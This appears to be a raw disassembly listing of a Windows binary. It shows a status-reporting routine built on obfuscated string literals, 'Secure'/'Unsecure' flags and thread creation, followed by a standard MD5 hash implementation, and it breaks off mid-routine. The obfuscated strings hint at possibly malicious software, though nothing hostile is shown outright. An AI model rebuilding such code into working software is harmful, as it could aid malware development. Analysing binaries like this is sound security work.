cmp [ebp+arg_14], eax
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_4146BB
cmp [ebp+arg_18], eax
jnz short loc_4146C4
push ebx
push edi
push offset aSS_1 ; "%s %s"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
xor eax, eax
loc_4146BB: ; CODE XREF: sub_40A938+9D65�j
cmp [ebp+arg_18], eax
loc_4146BE: ; CODE XREF: sub_40A938+1540�j
jz loc_4148CF
loc_4146C4: ; CODE XREF: sub_40A938:loc_40BE59�j
; sub_40A938+9D6A�j
push ebx
push edi
loc_4146C6: ; CODE XREF: sub_40A938+51F0�j
push offset aSS_1 ; "%s %s"
loc_4146CB: ; CODE XREF: sub_40A938+6FE�j
; sub_40A938+1E94�j ...
push dword ptr [esi]
loc_4146CD: ; CODE XREF: sub_40A938+466�j
; sub_40A938+1C0C�j
push [ebp+arg_10]
call sub_41CD0E
loc_4146D5: ; CODE XREF: sub_40A938+158�j
; sub_40A938+280F�j ...
add esp, 14h
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_4146DD: ; CODE XREF: sub_40A938+1D14�j
; sub_40A938+1D25�j
push dword ptr [ebx]
push offset aQbwgd0cfxf_ ; "qbwGd0CFxf./"
call edi ; dword_437174
mov ebx, eax
push 3
neg ebx
sbb ebx, ebx
inc ebx
call sub_423756
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_414740
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_414728
cmp [ebp+arg_18], 0
jnz short loc_414732
push eax
push ebx
push offset aFfec81uznt81 ; "fFEC81UzNT81"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_414728: ; CODE XREF: sub_40A938+9DD2�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_414732: ; CODE XREF: sub_40A938+9DD8�j
push [ebp+arg_C]
push ebx
push offset aFfec81uznt81 ; "fFEC81UzNT81"
jmp loc_414856
; ---------------------------------------------------------------------------
loc_414740: ; CODE XREF: sub_40A938+9DC2�j
mov eax, [ebp+arg_14]
mov [ebp+var_DA0], eax
mov eax, [ebp+arg_20]
mov [ebp+var_DA4], eax
push dword ptr [esi+0Ch]
lea eax, [ebp+var_E50]
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
xor edi, edi
cmp ebx, edi
mov [ebp+var_E54], eax
mov [ebp+var_DC0], ebx
mov [ebp+var_DBC], edi
mov ecx, offset aSecure ; "Secure"
jnz short loc_4147D4
mov ecx, offset aUnsecure ; "Unsecure"
mov eax, offset aJvatg1988z81 ; "jVATg1988z81"
loc_41478C: ; CODE XREF: sub_40A938+9EA1�j
push ecx
push eax
push offset aSS_ ; "%s %s."
push 3
call sub_4233DE
add esp, 10h
mov [ebp+var_DD0], eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_E54]
push edi
push eax
push offset sub_421F40
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_DD0]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jz short loc_4147F0
jmp short loc_4147E3
; ---------------------------------------------------------------------------
loc_4147D4: ; CODE XREF: sub_40A938+9E48�j
mov eax, offset aFfec81uznt81 ; "fFEC81UzNT81"
jmp short loc_41478C
; ---------------------------------------------------------------------------
loc_4147DB: ; CODE XREF: sub_40A938+9EB1�j
push 32h
call dword_43718C ; Sleep
loc_4147E3: ; CODE XREF: sub_40A938+9E9A�j
cmp [ebp+var_D98], edi
jz short loc_4147DB
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_4147F0: ; CODE XREF: sub_40A938+9E98�j
cmp [ebp+arg_14], 0
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_414831
cmp [ebp+arg_18], 0
jnz short loc_41483B
test ebx, ebx
mov [ebp+arg_C], offset aFfec81uznt81 ; "fFEC81UzNT81"
jnz short loc_414813
mov [ebp+arg_C], offset aJvatg1988z81 ; "jVATg1988z81"
loc_414813: ; CODE XREF: sub_40A938+9ED2�j
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push [ebp+arg_C]
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_414831: ; CODE XREF: sub_40A938+9EC1�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_41483B: ; CODE XREF: sub_40A938+9EC7�j
test ebx, ebx
mov ebx, offset aFfec81uznt81 ; "fFEC81UzNT81"
jnz short loc_414849
mov ebx, offset aJvatg1988z81 ; "jVATg1988z81"
loc_414849: ; CODE XREF: sub_40A938+17FA�j
; sub_40A938+1826�j ...
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
loc_414855: ; CODE XREF: sub_40A938+95A�j
; sub_40A938+FA1�j
push ebx
loc_414856: ; CODE XREF: sub_40A938+9A0�j
; sub_40A938+DD4�j ...
push edi
loc_414857: ; CODE XREF: sub_40A938+D01�j
; sub_40A938+4BD3�j ...
push dword ptr [esi]
loc_414859: ; CODE XREF: sub_40A938+A00�j
push [ebp+arg_10]
call sub_41CD0E
loc_414861: ; CODE XREF: sub_40A938+1508�j
add esp, 18h
jmp short loc_4148CF
; ---------------------------------------------------------------------------
loc_414866: ; CODE XREF: sub_40A938+18AD�j
; sub_40A938+18BE�j
xor eax, eax
cmp [ebp+arg_18], eax
jnz short loc_41489E
cmp [ebp+arg_20], eax
mov eax, offset aBuiltSep420092 ; " Built: Sep 4 2009 21:52:38"
jnz short loc_41487C
mov eax, offset byte_454A34
loc_41487C: ; CODE XREF: sub_40A938+9F3D�j
push eax
push offset a3c9 ; "]&3c9"
push offset dword_4439A4
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSSSS ; "%s %s (%s) %s"
loc_414891: ; CODE XREF: sub_40A938+290F�j
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
jmp short loc_4148CC
; ---------------------------------------------------------------------------
loc_41489E: ; CODE XREF: sub_40A938+9F33�j
cmp [ebp+arg_20], eax
mov eax, offset aBuiltSep420092 ; " Built: Sep 4 2009 21:52:38"
jnz short loc_4148AD
mov eax, offset byte_454A34
loc_4148AD: ; CODE XREF: sub_40A938+9F6E�j
push eax
push offset a3c9 ; "]&3c9"
push offset dword_4439A4
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSSSS ; "%s %s (%s) %s"
loc_4148C2: ; CODE XREF: sub_40A938+91A�j
; sub_40A938+1884�j ...
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
loc_4148CC: ; CODE XREF: sub_40A938+9F64�j
add esp, 1Ch
loc_4148CF: ; CODE XREF: sub_40A938+2B�j
; sub_40A938+3C�j ...
xor eax, eax
inc eax
loc_4148D2: ; CODE XREF: sub_40A938+1A9E�j
; sub_40A938+85F1�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40A938 endp
; =============== S U B R O U T I N E =======================================
sub_4148D7 proc near ; CODE XREF: sub_4154E4+23�p
push esi
mov esi, ecx
call sub_4154B8
mov eax, esi
pop esi
retn
sub_4148D7 endp
; =============== S U B R O U T I N E =======================================
sub_4148E3 proc near ; CODE XREF: sub_415413+3�p
and dword ptr [ecx], 0
and dword ptr [ecx+4], 0
mov dword ptr [ecx+8], 67452301h
mov dword ptr [ecx+0Ch], 0EFCDAB89h
mov dword ptr [ecx+10h], 98BADCFEh
mov dword ptr [ecx+14h], 10325476h
retn
sub_4148E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414907 proc near ; CODE XREF: sub_415294+45�p
; sub_415294+64�p
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 40h
mov eax, [ebp+arg_0]
xor edx, edx
push ebx
push esi
mov dh, [eax+3]
push edi
mov dl, [eax+2]
movzx esi, byte ptr [eax+1]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+5]
mov [ebp+var_40], edx
xor edx, edx
mov dh, [eax+7]
mov dl, [eax+6]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+4]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+9]
mov [ebp+var_3C], edx
xor edx, edx
mov dh, [eax+0Bh]
mov dl, [eax+0Ah]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+8]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+0Dh]
mov [ebp+var_38], edx
xor edx, edx
mov dh, [eax+0Fh]
mov dl, [eax+0Eh]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+0Ch]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+11h]
mov [ebp+var_34], edx
xor edx, edx
mov dh, [eax+13h]
mov dl, [eax+12h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+10h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+15h]
mov [ebp+var_30], edx
xor edx, edx
mov dh, [eax+17h]
mov dl, [eax+16h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+14h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+19h]
mov [ebp+var_2C], edx
xor edx, edx
mov dh, [eax+1Bh]
mov dl, [eax+1Ah]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+18h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+1Dh]
mov [ebp+var_28], edx
xor edx, edx
mov dh, [eax+1Fh]
mov dl, [eax+1Eh]
shl edx, 8
or edx, esi
shl edx, 8
movzx esi, byte ptr [eax+1Ch]
or edx, esi
movzx esi, byte ptr [eax+21h]
mov [ebp+var_24], edx
xor edx, edx
mov dh, [eax+23h]
mov dl, [eax+22h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+20h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+25h]
mov [ebp+var_20], edx
xor edx, edx
mov dh, [eax+27h]
mov dl, [eax+26h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+24h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+29h]
mov [ebp+var_1C], edx
xor edx, edx
mov dh, [eax+2Bh]
mov dl, [eax+2Ah]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+28h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+2Dh]
mov [ebp+var_18], edx
xor edx, edx
mov dh, [eax+2Fh]
mov dl, [eax+2Eh]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+2Ch]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+31h]
mov [ebp+var_14], edx
xor edx, edx
mov dh, [eax+33h]
mov dl, [eax+32h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+30h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+35h]
mov [ebp+var_10], edx
xor edx, edx
mov dh, [eax+37h]
mov dl, [eax+36h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+34h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+39h]
mov [ebp+var_C], edx
xor edx, edx
mov dh, [eax+3Bh]
mov dl, [eax+3Ah]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+38h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+3Dh]
mov [ebp+var_8], edx
xor edx, edx
mov dh, [eax+3Fh]
mov dl, [eax+3Eh]
movzx eax, byte ptr [eax+3Ch]
shl edx, 8
or edx, esi
shl edx, 8
mov esi, [ecx+14h]
mov edi, [ecx+10h]
mov ebx, [ecx+0Ch]
or edx, eax
mov eax, [ecx+8]
mov [ebp+var_4], edx
mov edx, esi
xor edx, edi
and edx, ebx
xor edx, esi
add edx, eax
mov eax, [ebp+var_40]
lea edx, [edx+eax-28955B88h]
mov eax, edx
shr eax, 19h
shl edx, 7
or eax, edx
mov edx, edi
add eax, ebx
xor edx, ebx
and edx, eax
xor edx, edi
add edx, [ebp+var_3C]
lea esi, [esi+edx-173848AAh]
mov edx, esi
shr edx, 14h
shl esi, 0Ch
or edx, esi
mov esi, ebx
add edx, eax
xor esi, eax
and esi, edx
xor esi, ebx
mov ebx, edx
add esi, [ebp+var_38]
xor ebx, eax
lea edi, [edi+esi+242070DBh]
mov esi, edi
shr esi, 0Fh
shl edi, 11h
or esi, edi
mov edi, [ecx+0Ch]
add esi, edx
and ebx, esi
xor ebx, eax
add ebx, [ebp+var_34]
lea edi, [edi+ebx-3E423112h]
mov ebx, edi
shl ebx, 16h
shr edi, 0Ah
or ebx, edi
mov edi, edx
add ebx, esi
xor edi, esi
and edi, ebx
mov [ebp+arg_0], ebx
xor edi, edx
add edi, [ebp+var_30]
lea eax, [eax+edi-0A83F051h]
mov edi, eax
shr edi, 19h
shl eax, 7
or edi, eax
mov eax, esi
add edi, ebx
xor eax, ebx
and eax, edi
xor eax, esi
add eax, [ebp+var_2C]
lea edx, [edx+eax+4787C62Ah]
mov eax, edx
shr eax, 14h
shl edx, 0Ch
or eax, edx
mov edx, ebx
add eax, edi
xor edx, edi
and edx, eax
xor edx, ebx
add edx, [ebp+var_28]
lea esi, [esi+edx-57CFB9EDh]
mov edx, esi
shr edx, 0Fh
shl esi, 11h
or edx, esi
mov esi, eax
add edx, eax
xor esi, edi
and esi, edx
xor esi, edi
add esi, [ebp+var_24]
lea esi, [ebx+esi-2B96AFFh]
mov ebx, esi
shl ebx, 16h
shr esi, 0Ah
or ebx, esi
mov esi, eax
xor esi, edx
add ebx, edx
and esi, ebx
mov [ebp+arg_0], ebx
xor esi, eax
add esi, [ebp+var_20]
lea edi, [edi+esi+698098D8h]
mov esi, edi
shr esi, 19h
shl edi, 7
or esi, edi
mov edi, edx
add esi, ebx
xor edi, ebx
and edi, esi
xor edi, edx
add edi, [ebp+var_1C]
lea eax, [eax+edi-74BB0851h]
mov edi, eax
shr edi, 14h
shl eax, 0Ch
or edi, eax
mov eax, ebx
add edi, esi
xor eax, esi
and eax, edi
xor eax, ebx
add eax, [ebp+var_18]
lea edx, [edx+eax-0A44Fh]
mov eax, edx
shr eax, 0Fh
shl edx, 11h
or eax, edx
mov edx, edi
add eax, edi
xor edx, esi
and edx, eax
xor edx, esi
add edx, [ebp+var_14]
lea edx, [ebx+edx-76A32842h]
mov ebx, edx
shl ebx, 16h
shr edx, 0Ah
or ebx, edx
mov edx, edi
add ebx, eax
xor edx, eax
and edx, ebx
mov [ebp+arg_0], ebx
xor edx, edi
add edx, [ebp+var_10]
lea esi, [esi+edx+6B901122h]
mov edx, esi
shr edx, 19h
shl esi, 7
or edx, esi
mov esi, eax
add edx, ebx
xor esi, ebx
and esi, edx
xor esi, eax
add esi, [ebp+var_C]
lea edi, [edi+esi-2678E6Dh]
mov ebx, edi
shr ebx, 14h
shl edi, 0Ch
or ebx, edi
mov edi, [ebp+arg_0]
mov esi, edi
add ebx, edx
xor esi, edx
and esi, ebx
xor esi, edi
add esi, [ebp+var_8]
lea eax, [eax+esi-5986BC72h]
mov esi, eax
shr esi, 0Fh
shl eax, 11h
or esi, eax
mov eax, ebx
add esi, ebx
xor eax, edx
and eax, esi
xor eax, edx
add eax, [ebp+var_4]
lea edi, [edi+eax+49B40821h]
mov eax, edi
shl eax, 16h
shr edi, 0Ah
or eax, edi
mov edi, esi
add eax, esi
xor edi, eax
and edi, ebx
xor edi, esi
add edi, [ebp+var_3C]
lea edx, [edx+edi-9E1DA9Eh]
mov edi, edx
shr edi, 1Bh
shl edx, 5
or edi, edx
mov edx, eax
add edi, eax
xor edx, edi
and edx, esi
xor edx, eax
add edx, [ebp+var_28]
lea ebx, [ebx+edx-3FBF4CC0h]
mov edx, ebx
shr edx, 17h
shl ebx, 9
or edx, ebx
add edx, edi
mov ebx, edx
xor ebx, edi
and ebx, eax
xor ebx, edi
add ebx, [ebp+var_14]
lea esi, [esi+ebx+265E5A51h]
mov ebx, esi
shr ebx, 12h
shl esi, 0Eh
or ebx, esi
mov esi, edx
add ebx, edx
xor esi, ebx
and esi, edi
xor esi, edx
add esi, [ebp+var_40]
lea eax, [eax+esi-16493856h]
mov esi, eax
shl esi, 14h
shr eax, 0Ch
or esi, eax
mov eax, ebx
add esi, ebx
xor eax, esi
and eax, edx
xor eax, ebx
add eax, [ebp+var_2C]
lea edi, [edi+eax-29D0EFA3h]
mov eax, edi
shr eax, 1Bh
shl edi, 5
or eax, edi
add eax, esi
mov edi, esi
xor edi, eax
and edi, ebx
xor edi, esi
add edi, [ebp+var_18]
lea edx, [edx+edi+2441453h]
mov edi, edx
shr edi, 17h
shl edx, 9
or edi, edx
add edi, eax
mov edx, edi
xor edx, eax
and edx, esi
xor edx, eax
add edx, [ebp+var_4]
lea ebx, [ebx+edx-275E197Fh]
mov edx, ebx
shr edx, 12h
shl ebx, 0Eh
or edx, ebx
mov ebx, edi
add edx, edi
xor ebx, edx
and ebx, eax
xor ebx, edi
add ebx, [ebp+var_30]
lea esi, [esi+ebx-182C0438h]
mov ebx, esi
shl ebx, 14h
shr esi, 0Ch
or ebx, esi
mov esi, edx
add ebx, edx
xor esi, ebx
and esi, edi
xor esi, edx
add esi, [ebp+var_1C]
lea eax, [eax+esi+21E1CDE6h]
mov esi, eax
shr esi, 1Bh
shl eax, 5
or esi, eax
mov eax, ebx
add esi, ebx
xor eax, esi
and eax, edx
xor eax, ebx
add eax, [ebp+var_8]
lea edi, [edi+eax-3CC8F82Ah]
mov eax, edi
shr eax, 17h
shl edi, 9
or eax, edi
add eax, esi
mov edi, eax
xor edi, esi
and edi, ebx
xor edi, esi
add edi, [ebp+var_34]
lea edx, [edx+edi-0B2AF279h]
mov edi, edx
shr edi, 12h
shl edx, 0Eh
or edi, edx
mov edx, eax
add edi, eax
xor edx, edi
and edx, esi
xor edx, eax
add edx, [ebp+var_20]
lea ebx, [ebx+edx+455A14EDh]
mov edx, ebx
shl edx, 14h
shr ebx, 0Ch
or edx, ebx
mov ebx, edi
add edx, edi
xor ebx, edx
and ebx, eax
xor ebx, edi
add ebx, [ebp+var_C]
lea esi, [esi+ebx-561C16FBh]
mov ebx, esi
shr ebx, 1Bh
shl esi, 5
or ebx, esi
mov esi, edx
add ebx, edx
xor esi, ebx
and esi, edi
xor esi, edx
add esi, [ebp+var_38]
lea eax, [eax+esi-3105C08h]
mov esi, eax
shr esi, 17h
shl eax, 9
or esi, eax
add esi, ebx
mov eax, esi
mov [ebp+arg_0], esi
xor eax, ebx
and eax, edx
xor eax, ebx
add eax, [ebp+var_24]
lea eax, [edi+eax+676F02D9h]
mov edi, eax
shr edi, 12h
shl eax, 0Eh
or edi, eax
add edi, esi
xor [ebp+arg_0], edi
mov eax, [ebp+arg_0]
and eax, ebx
xor eax, esi
add eax, [ebp+var_10]
lea edx, [edx+eax-72D5B376h]
mov eax, edx
shl eax, 14h
shr edx, 0Ch
or eax, edx
mov edx, [ebp+arg_0]
add eax, edi
xor edx, eax
add edx, [ebp+var_2C]
lea ebx, [ebx+edx-5C6BEh]
mov edx, ebx
shr edx, 1Ch
shl ebx, 4
or edx, ebx
mov ebx, edi
add edx, eax
xor ebx, eax
xor ebx, edx
add ebx, [ebp+var_20]
lea esi, [esi+ebx-788E097Fh]
mov ebx, esi
shr ebx, 15h
shl esi, 0Bh
or ebx, esi
add ebx, edx
mov esi, ebx
mov [ebp+arg_0], ebx
xor esi, eax
xor esi, edx
add esi, [ebp+var_14]
lea edi, [edi+esi+6D9D6122h]
mov esi, edi
shr esi, 10h
shl edi, 10h
or esi, edi
add esi, ebx
xor [ebp+arg_0], esi
mov edi, [ebp+arg_0]
xor edi, edx
add edi, [ebp+var_8]
lea edi, [eax+edi-21AC7F4h]
mov eax, edi
shl eax, 17h
shr edi, 9
or eax, edi
add eax, esi
mov edi, [ebp+arg_0]
xor edi, eax
add edi, [ebp+var_3C]
lea edi, [edx+edi-5B4115BCh]
mov edx, edi
shr edx, 1Ch
shl edi, 4
or edx, edi
mov edi, esi
add edx, eax
xor edi, eax
xor edi, edx
add edi, [ebp+var_30]
lea ebx, [ebx+edi+4BDECFA9h]
mov edi, ebx
shr edi, 15h
shl ebx, 0Bh
or edi, ebx
add edi, edx
mov ebx, edi
mov [ebp+arg_0], edi
xor ebx, eax
xor ebx, edx
add ebx, [ebp+var_24]
lea esi, [esi+ebx-944B4A0h]
mov ebx, esi
shr ebx, 10h
shl esi, 10h
or ebx, esi
add ebx, edi
xor [ebp+arg_0], ebx
mov esi, [ebp+arg_0]
xor esi, edx
add esi, [ebp+var_18]
lea esi, [eax+esi-41404390h]
mov eax, esi
shl eax, 17h
shr esi, 9
or eax, esi
mov esi, [ebp+arg_0]
add eax, ebx
xor esi, eax
add esi, [ebp+var_C]
lea esi, [edx+esi+289B7EC6h]
mov edx, esi
shr edx, 1Ch
shl esi, 4
or edx, esi
mov esi, ebx
add edx, eax
xor esi, eax
xor esi, edx
add esi, [ebp+var_40]
lea edi, [edi+esi-155ED806h]
mov esi, edi
shr esi, 15h
shl edi, 0Bh
or esi, edi
add esi, edx
mov edi, esi
mov [ebp+arg_0], esi
xor edi, eax
xor edi, edx
add edi, [ebp+var_34]
lea ebx, [ebx+edi-2B10CF7Bh]
mov edi, ebx
shr edi, 10h
shl ebx, 10h
or edi, ebx
add edi, esi
xor [ebp+arg_0], edi
mov ebx, [ebp+arg_0]
xor ebx, edx
add ebx, [ebp+var_28]
lea ebx, [eax+ebx+4881D05h]
mov eax, ebx
shl eax, 17h
shr ebx, 9
or eax, ebx
mov ebx, [ebp+arg_0]
add eax, edi
xor ebx, eax
add ebx, [ebp+var_1C]
lea ebx, [edx+ebx-262B2FC7h]
mov edx, ebx
shr edx, 1Ch
shl ebx, 4
or edx, ebx
mov ebx, edi
xor ebx, eax
add edx, eax
xor ebx, edx
add ebx, [ebp+var_10]
lea ebx, [esi+ebx-1924661Bh]
mov esi, ebx
shr esi, 15h
shl ebx, 0Bh
or esi, ebx
add esi, edx
mov ebx, esi
xor ebx, eax
xor ebx, edx
add ebx, [ebp+var_4]
lea ebx, [edi+ebx+1FA27CF8h]
mov edi, ebx
shr edi, 10h
shl ebx, 10h
or edi, ebx
mov ebx, esi
add edi, esi
xor ebx, edi
xor ebx, edx
add ebx, [ebp+var_38]
lea eax, [eax+ebx-3B53A99Bh]
mov ebx, eax
shl ebx, 17h
shr eax, 9
or ebx, eax
mov eax, esi
add ebx, edi
not eax
or eax, ebx
xor eax, edi
add eax, [ebp+var_40]
lea edx, [edx+eax-0BD6DDBCh]
mov eax, edx
shr eax, 1Ah
shl edx, 6
or eax, edx
mov edx, edi
add eax, ebx
not edx
or edx, eax
xor edx, ebx
add edx, [ebp+var_24]
lea esi, [esi+edx+432AFF97h]
mov edx, esi
shr edx, 16h
shl esi, 0Ah
or edx, esi
mov esi, ebx
add edx, eax
not esi
or esi, edx
xor esi, eax
add esi, [ebp+var_8]
lea edi, [edi+esi-546BDC59h]
mov esi, edi
shr esi, 11h
shl edi, 0Fh
or esi, edi
mov edi, eax
add esi, edx
not edi
or edi, esi
xor edi, edx
add edi, [ebp+var_2C]
lea ebx, [ebx+edi-36C5FC7h]
mov edi, ebx
shl edi, 15h
shr ebx, 0Bh
or edi, ebx
mov ebx, edx
add edi, esi
not ebx
or ebx, edi
xor ebx, esi
add ebx, [ebp+var_10]
lea ebx, [eax+ebx+655B59C3h]
mov eax, ebx
shl ebx, 6
shr eax, 1Ah
or eax, ebx
mov ebx, esi
not ebx
add eax, edi
or ebx, eax
xor ebx, edi
add ebx, [ebp+var_34]
lea ebx, [edx+ebx-70F3336Eh]
mov edx, ebx
shl ebx, 0Ah
shr edx, 16h
or edx, ebx
mov ebx, edi
not ebx
add edx, eax
or ebx, edx
xor ebx, eax
add ebx, [ebp+var_18]
lea ebx, [esi+ebx-100B83h]
mov esi, ebx
shl ebx, 0Fh
shr esi, 11h
or esi, ebx
mov ebx, eax
add esi, edx
not ebx
or ebx, esi
xor ebx, edx
add ebx, [ebp+var_3C]
lea ebx, [edi+ebx-7A7BA22Fh]
mov edi, ebx
shl edi, 15h
shr ebx, 0Bh
or edi, ebx
mov ebx, edx
add edi, esi
not ebx
or ebx, edi
xor ebx, esi
add ebx, [ebp+var_20]
lea ebx, [eax+ebx+6FA87E4Fh]
mov eax, ebx
shr eax, 1Ah
shl ebx, 6
or eax, ebx
mov ebx, esi
add eax, edi
not ebx
or ebx, eax
xor ebx, edi
add ebx, [ebp+var_4]
lea ebx, [edx+ebx-1D31920h]
mov edx, ebx
shr edx, 16h
shl ebx, 0Ah
or edx, ebx
mov ebx, edi
add edx, eax
not ebx
or ebx, edx
xor ebx, eax
add ebx, [ebp+var_28]
lea ebx, [esi+ebx-5CFEBCECh]
mov esi, ebx
shr esi, 11h
shl ebx, 0Fh
or esi, ebx
mov ebx, eax
add esi, edx
not ebx
or ebx, esi
xor ebx, edx
add ebx, [ebp+var_C]
lea ebx, [edi+ebx+4E0811A1h]
mov edi, ebx
shl edi, 15h
shr ebx, 0Bh
or edi, ebx
mov ebx, edx
add edi, esi
not ebx
or ebx, edi
xor ebx, esi
add ebx, [ebp+var_30]
lea ebx, [eax+ebx-8AC817Eh]
mov eax, ebx
shr eax, 1Ah
shl ebx, 6
or eax, ebx
mov ebx, esi
add eax, edi
not ebx
or ebx, eax
xor ebx, edi
add ebx, [ebp+var_14]
lea edx, [edx+ebx-42C50DCBh]
mov ebx, edx
shr ebx, 16h
shl edx, 0Ah
or ebx, edx
mov edx, edi
add ebx, eax
not edx
or edx, ebx
xor edx, eax
add edx, [ebp+var_38]
lea esi, [esi+edx+2AD7D2BBh]
mov edx, esi
shr edx, 11h
shl esi, 0Fh
or edx, esi
mov esi, eax
add edx, ebx
not esi
or esi, edx
xor esi, ebx
add esi, [ebp+var_1C]
lea edi, [edi+esi-14792C6Fh]
mov esi, [ecx+8]
add esi, eax
mov eax, edi
shl eax, 15h
shr edi, 0Bh
or eax, edi
mov [ecx+8], esi
add eax, [ecx+0Ch]
pop edi
pop esi
add eax, edx
mov [ecx+0Ch], eax
mov eax, [ecx+10h]
add eax, edx
mov [ecx+10h], eax
mov eax, [ecx+14h]
add eax, ebx
pop ebx
mov [ecx+14h], eax
leave
retn 4
sub_414907 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415294 proc near ; CODE XREF: sub_415327+66�p
; sub_415327+73�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, ecx
mov ecx, [ebp+arg_4]
push edi
test ecx, ecx
jz short loc_415321
mov eax, [esi]
push ebx
mov edi, eax
push 40h
and edi, 3Fh
pop ebx
add eax, ecx
sub ebx, edi
cmp eax, ecx
mov [esi], eax
jnb short loc_4152BA
inc dword ptr [esi+4]
loc_4152BA: ; CODE XREF: sub_415294+21�j
test edi, edi
jz short loc_4152E9
cmp ecx, ebx
jb short loc_4152E9
push ebx
lea eax, [edi+esi+18h]
push [ebp+arg_0]
push eax
call sub_429350
add esp, 0Ch
lea eax, [esi+18h]
mov ecx, esi
push eax
call sub_414907
sub [ebp+arg_4], ebx
add [ebp+arg_0], ebx
mov ecx, [ebp+arg_4]
xor edi, edi
loc_4152E9: ; CODE XREF: sub_415294+28�j
; sub_415294+2C�j
cmp ecx, 40h
jb short loc_41530B
mov ebx, ecx
shr ebx, 6
loc_4152F3: ; CODE XREF: sub_415294+72�j
push [ebp+arg_0]
mov ecx, esi
call sub_414907
sub [ebp+arg_4], 40h
add [ebp+arg_0], 40h
dec ebx
jnz short loc_4152F3
mov ecx, [ebp+arg_4]
loc_41530B: ; CODE XREF: sub_415294+58�j
test ecx, ecx
pop ebx
jz short loc_415321
push ecx
lea eax, [edi+esi+18h]
push [ebp+arg_0]
push eax
call sub_429350
add esp, 0Ch
loc_415321: ; CODE XREF: sub_415294+C�j
; sub_415294+7A�j
pop edi
pop esi
pop ebp
retn 8
sub_415294 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415327 proc near ; CODE XREF: sub_415413+24�p
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
push 38h
mov edi, [esi]
mov eax, [esi+4]
mov ecx, edi
shl eax, 3
shr ecx, 1Dh
or eax, ecx
mov ecx, edi
shl ecx, 3
mov edx, ecx
mov [ebp+var_8], cl
shr edx, 8
mov [ebp+var_7], dl
mov edx, ecx
loc_415353: ; DATA XREF: .text:off_43D40C�o
shr ecx, 18h
mov [ebp+var_5], cl
mov ecx, eax
shr ecx, 8
mov [ebp+var_3], cl
mov [ebp+var_4], al
mov ecx, eax
and edi, 3Fh
